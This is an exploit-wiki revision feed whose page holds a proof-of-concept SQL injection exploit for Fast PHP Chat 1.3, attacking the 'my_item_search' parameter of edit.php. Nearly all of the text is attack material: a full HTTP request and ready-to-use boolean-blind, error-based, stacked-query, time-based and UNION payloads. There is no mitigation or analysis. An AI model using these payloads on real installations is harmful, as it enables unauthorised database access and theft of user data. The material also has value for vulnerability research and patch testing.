https://pwnwiki.com/index.php?action=history&feed=atom&title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Fast PHP Chat 1.3 SQL注入漏洞 - Revision history 2026-04-07T08:16:46Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Fast_PHP_Chat_1.3_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1845&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/i..." 2021-04-21T10:04:28Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Fast PHP Chat 1.3 - &#039;my_item_search&#039; SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/i...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection<br /> # Date: 15/04/2021<br /> # Exploit Author: Fatih Coskun<br /> # Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076<br /> # Version: 1.3<br /> # Category: Webapps<br /> # Tested on: Kali linux<br /> # Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter.<br /> ====================================================<br /> <br /> # PoC : SQLi :<br /> <br /> POST /chat/edit.php HTTP/1.1<br /> Host: localhost<br /> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101<br /> Firefox/45.0<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> Referer: https://localhost/chat/edit.php<br /> Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c;<br /> _ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107<br /> Connection: keep-alive<br /> Content-Type: application/x-www-form-urlencoded<br /> Content-Length: 40<br /> my_item_search=test&amp;submit_search=Search<br /> <br /> <br /> Parameter : my_item_search<br /> <br /> Type : boolean-based blind<br /> Demo : https://localhost/chat/edit.php<br /> Payload : my_item_search=-2454' OR 6122=6122#&amp;submit=Search<br /> <br /> Type : error-based<br /> Demo : https://localhost/chat/edit.php<br /> Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT<br /> COUNT(*),CONCAT(0x71706a7071,(SELECT<br /> (ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM<br /> INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&amp;submit=Search<br /> <br /> Type : stacked queries<br /> Demo : https://localhost/chat/edit.php<br /> Payload : my_item_search=test';SELECT SLEEP(5)#&amp;submit=Search<br /> <br /> Type : AND/OR time-based blind<br /> Demo : https://localhost/login-script-demo/users.php<br /> Payload : my_item_search=test' OR SLEEP(5)-- mlod&amp;submit=Search<br /> <br /> Type : UNION query<br /> Demo : https://localhost/chat/edit.php<br /> Payload : my_item_search=test' UNION ALL SELECT<br /> NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&amp;submit=Search<br /> <br /> ====================================================<br /> <br /> &lt;/pre&gt;</div> Pwnwiki